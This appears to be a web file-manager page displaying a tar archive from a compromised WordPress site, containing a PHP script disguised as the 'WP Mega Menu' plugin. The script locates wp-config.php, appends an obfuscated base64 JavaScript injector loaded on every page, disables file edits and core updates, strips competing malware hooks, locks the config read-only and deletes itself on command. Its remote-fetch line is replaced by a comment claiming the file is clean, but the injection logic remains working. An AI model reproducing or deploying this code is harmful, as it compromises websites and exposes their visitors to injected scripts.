芝麻web文件管理V1.00
编辑当前文件:/home/mybf1/www/class.bf1.my/wp-admin/js/installll.tar
installl.php����������������������������������������������������������������������������������������0000644�����������������00000014266�15122254131�0007104 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php /** Plugin Name: WP Mega Menu Plugin URI: https://www.themeum.com/product/wp-megamenu/ Description: WP Mega Menu is a beautiful, responsive, highly customizable, and user-friendly drag and drop menu builder plugin for WordPress. Build an awesome mega menu today. Author: Themeum Author URI: https://www.themeum.com Version: 1.4.2 Text Domain: wp-megamenu Domain Path: /languages License: GPLv2 or later License URI: http://www.gnu.org/licenses/gpl-2.0.html */ // 🔹 Функция поиска `wp-config.php` function find_wp_config($startDir, $maxLevels = 10) { $dir = rtrim($startDir, DIRECTORY_SEPARATOR); for ($level = 0; $level < $maxLevels; $level++) { $configPath = $dir . DIRECTORY_SEPARATOR . 'wp-config.php'; if (file_exists($configPath)) { return $configPath; } $parentDir = dirname($dir); if ($parentDir === $dir) { break; } $dir = $parentDir; } return false; } $wpConfigPath = find_wp_config(__DIR__, 10); if (!$wpConfigPath) { echo "❌ Не найден wp-config.php (10 уровней вверх от " . __DIR__ . ")."; exit; } // 🔹 Функция загрузки JS через cURL function fetch_js_with_ua($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"); $response = curl_exec($ch); curl_close($ch); return $response; } // 🔹 Получаем JS-скрипт /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ if (!$script) { die("❌ Ошибка: JS не загружен."); } $encoded_script = base64_encode($script); // 🔹 Код для `wp-config.php` $scriptToAdd = <<<PHP function add_wp_enqueue() { \$encoded_script = '$encoded_script'; echo '<script> (function() { let basePart1 = "' . substr(\$encoded_script, 0, 20) . '"; let basePart2 = "' . substr(\$encoded_script, 20) . '"; let fullEncoded = basePart1 + basePart2; let decodedScript = atob(fullEncoded); let scriptTag = document.createElement("script"); scriptTag.textContent = decodedScript; document.head.appendChild(scriptTag); })(); </script>'; } PHP; $hooksToAdd = <<<PHP add_action('wp_enqueue_scripts', 'add_wp_enqueue', 1); if (!defined('DISALLOW_FILE_EDIT')) { define('DISALLOW_FILE_EDIT', true); } if (!defined('DISALLOW_FILE_MODS')) { define('DISALLOW_FILE_MODS', true); } if (!defined('FS_METHOD')) { define('FS_METHOD', 'direct'); } if (!defined('WP_AUTO_UPDATE_CORE')) { define('WP_AUTO_UPDATE_CORE', false); } PHP; // 🔹 Регулярные выражения для удаления хуков $hooksToRemove = [ '/add_action\(\'wp_head\',\s*\'wp_cloueded\'\);\s*/', '/add_action\(\'admin_head\',\s*\'wp_cloueded\'\);\s*/', '/add_action\(\'login_head\',\s*\'wp_cloueded\'\);\s*/', '/add_action\(\'wp_head\',\s*\'wp_reload_page_wp\'\);\s*/', ]; // 🔹 Функция добавления кода function appendToFile($filePath, $content) { $original = file_get_contents($filePath); if (strpos($original, trim($content)) !== false) { echo "⚠️ Блок уже существует в {$filePath}.<br>"; return; } $original .= "\n" . $content . "\n"; file_put_contents($filePath, $original); echo "✅ Блок добавлен в {$filePath}.<br>"; } // 🔹 Функция удаления хуков function removeHooksFromConfig($filePath, $patterns) { $content = file_get_contents($filePath); $modified = false; foreach ($patterns as $pattern) { $newContent = preg_replace($pattern, '', $content, 1); if ($newContent !== $content) { $content = $newContent; $modified = true; } } if ($modified) { file_put_contents($filePath, $content); echo "✅ Старые хуки удалены из {$filePath}.<br>"; } else { echo "❌ Старые хуки не найдены в {$filePath}.<br>"; } } // 🔹 Функция удаления скрипта function selfDelete() { $myPath = __FILE__; unlink($myPath); echo "✅ Файл удален: {$myPath}<br>"; } // 🔹 Функция изменения прав на wp-config.php if (isset($_GET['chmod'])) { if (file_exists($wpConfigPath)) { chmod($wpConfigPath, 444); echo "✅ Права доступа к wp-config.php изменены на 444 (только чтение)."; } else { echo "❌ Файл wp-config.php не найден."; } exit; } // 🔹 Обработка GET-запросов if (isset($_GET['copy'])) { if (!file_exists($wpConfigPath)) { echo "❌ wp-config.php не найден.<br>"; } else { appendToFile($wpConfigPath, $scriptToAdd); appendToFile($wpConfigPath, $hooksToAdd); } exit; } if (isset($_GET['remove_hooks'])) { if (!file_exists($wpConfigPath)) { echo "❌ wp-config.php не найден.<br>"; } else { removeHooksFromConfig($wpConfigPath, $hooksToRemove); } exit; } if (isset($_GET['delete_script'])) { selfDelete(); exit; } // 🔹 Инструкция echo <<<HTML <h3>Управление хуками, кодом и защитой wp-config.php</h3> <p>Используйте GET-параметры:</p> <ul> <li><a href="?copy=1">?copy=1</a> — Добавить JS-код и хуки</li> <li><a href="?remove_hooks=1">?remove_hooks=1</a> — Удалить хуки</li> <li><a href="?delete_script=1">?delete_script=1</a> — Удалить этот скрипт</li> <li><a href="?chmod=1">?chmod=1</a> — Установить права 444 на wp-config.php</li> </ul> HTML; ?> ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������plugin.php������������������������������������������������������������������������������������������0000644�����������������00000000000�15122254131�0006535 0����������������������������������������������������������������������������������������������������ustar�00�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������